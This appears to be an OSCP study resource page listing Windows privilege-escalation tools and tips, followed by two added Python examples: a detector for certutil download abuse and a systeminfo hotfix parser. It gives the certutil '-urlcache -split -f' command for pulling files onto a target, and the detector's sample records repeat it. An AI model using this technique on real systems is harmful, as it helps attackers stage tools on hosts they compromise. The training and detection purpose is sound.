Aaron Goldstein

Interview is here.

  • https://pentest.ws/ - Great site for tracking progress against machines (can import nmap data for tracking too). I use this all the time for the Venom builder (shell creation) and other cool stuff. The free version works great.

  • AutoRecon is the tool I used for automating the enumeration process (and OSCP exam approved). I also used a LOLBIN (Living off the Land Binary) to download files from the Windows box - the command was "Certutil -urlcache -split -f <link to file to download>". These are great because most systems will already have them installed.

  • Here is a great site that outlines TONS of them.

  • A few links / tools that helped me with Windows Privesc:

    List of pre-compiled binaries for different exploits - https://github.com/abatchy17/WindowsExploits

  • WATSON - tool for identifying exploits for Windows privesc - requires .NET - runs on target host.

    Quick method to check what version of .NET is installed on host (needed for Watson) - reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

  • Windows Exploit Suggester - This is a great tool for finding exploits on Windows hosts for privesc too - but this one takes in the "systeminfo" output from the target host and runs locally on the attacker system.
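
The certutil download trick noted above, seen from the defender's side: an added detection example (not from the interview or from any tool it mentions) that scans process-creation records for certutil.exe being driven as a downloader. The records below are constructed samples, and the `image|command line` record format and the field names are assumptions for the example; certutil really does accept both `-` and `/` as the switch prefix and ignores case, so the rule normalises both.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records (not real telemetry), one per entry,
# in an assumed "image|command line" format. Only certutil fetching a URL should match.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://example.invalid/tool.exe tool.exe",
    r"C:\Windows\System32\certutil.exe|certutil -store My",
    r"C:\Windows\System32\certutil.exe|Certutil /URLCache /Split /F https://example.invalid/a.txt a.txt",
    r"C:\Windows\System32\cmd.exe|cmd /c dir",
    r"C:\Windows\System32\certutil.exe|certutil -urlcache",
    r"C:\Windows\System32\certutil.exe|certutil -urlcache -f http://example.invalid/x.dat",
]

# certutil accepts both '-' and '/' as the switch prefix and is case-insensitive.
URLCACHE_RE = re.compile(r"[-/]urlcache\b", re.IGNORECASE)
SPLIT_RE = re.compile(r"[-/]split\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    command: str         # full command line that matched
    url: str             # remote resource certutil was told to fetch
    split_to_disk: bool  # -split writes the fetched content to a local file


def is_certutil(image: str) -> bool:
    """True when the image path's file name is certutil.exe (any directory, any case)."""
    return image.lower().replace("/", "\\").rsplit("\\", 1)[-1] == "certutil.exe"


def find_certutil_downloads(events):
    """Return a Finding for each record where certutil.exe runs with -urlcache and a URL.

    A bare '-urlcache' with no URL only lists the local URL cache and is not reported,
    which keeps the rule from firing on routine certificate maintenance.
    """
    findings = []
    for record in events:
        image, _, cmd = record.partition("|")
        if not is_certutil(image) or not URLCACHE_RE.search(cmd):
            continue
        url = URL_RE.search(cmd)
        if url is None:
            continue
        findings.append(Finding(cmd, url.group(0), SPLIT_RE.search(cmd) is not None))
    return findings


if __name__ == "__main__":
    for f in find_certutil_downloads(SAMPLE_EVENTS):
        print(f"ALERT certutil download url={f.url} split_to_disk={f.split_to_disk}")
```

Requiring a URL in the command line is the main false-positive control: `certutil -urlcache` on its own only lists the cache, and `-store` style invocations never carry a URL. Matching on the image file name rather than the full path also catches a copy of certutil.exe renamed into another directory only if the file name is kept; a renamed binary needs a hash-based rule instead.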
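
Windows Exploit Suggester works from `systeminfo` output, so the useful thing to understand is what that text looks like and what has to be pulled out of it. As an added example (not part of the interview and not the tool's own code), here is a small parser for that output that extracts the OS build and the installed hotfix list and compares it against a baseline; the same inventory is what a patch-compliance check needs. The systeminfo text, the KB numbers and the baseline list are constructed placeholders.

```python
import re

# Constructed systeminfo output (not captured from a real host); KB numbers are placeholders.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN-EXAMPLE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
System Type:               x64-based PC
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
                           [03]: KB3333333
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Adapter
"""

FIELD_RE = re.compile(r"^([A-Za-z][^:]*):\s*(.*)$")            # "Key:   value" lines at column 0
HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)   # "[01]: KB1234567" continuation lines
BUILD_RE = re.compile(r"Build (\d+)")


def parse_fields(text):
    """Group systeminfo lines into {key: [first value, continuation lines...]}.

    Indented lines belong to the most recent key; the key stops at the first colon,
    so values that contain colons (time zones) are kept intact.
    """
    fields, current = {}, None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace():
            if current is not None:
                fields[current].append(raw.strip())
            continue
        m = FIELD_RE.match(raw)
        if m:
            current = m.group(1).strip()
            fields[current] = [m.group(2).strip()]
    return fields


def parse_systeminfo(text):
    """Reduce systeminfo output to the fields a patch-level lookup needs."""
    fields = parse_fields(text)
    version_line = fields.get("OS Version", [""])[0]
    build = BUILD_RE.search(version_line)
    hotfixes = []
    for line in fields.get("Hotfix(s)", [])[1:]:   # skip the "N Hotfix(s) Installed." summary
        m = HOTFIX_RE.search(line)
        if m:
            hotfixes.append(m.group(1).upper())
    return {
        "os_name": fields.get("OS Name", [""])[0],
        "os_version": version_line.split()[0] if version_line else "",
        "build": int(build.group(1)) if build else None,
        "arch": fields.get("System Type", [""])[0],
        "hotfixes": hotfixes,
    }


def missing_hotfixes(report, required):
    """KBs from a baseline list that the host does not report as installed."""
    installed = set(report["hotfixes"])
    return [kb.upper() for kb in required if kb.upper() not in installed]


if __name__ == "__main__":
    report = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(report["os_name"], report["os_version"], "build", report["build"], report["arch"])
    print("installed:", report["hotfixes"])
    print("missing from baseline:", missing_hotfixes(report, ["KB2222222", "KB4444444"]))
```

The hotfix list from `systeminfo` only reflects what Windows Update reports as installed; servicing-stack changes and superseded KBs can make a host look unpatched when it is not, so any baseline comparison built on this output is a starting point for a patch review, not a verdict.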

---

Key takeaways:
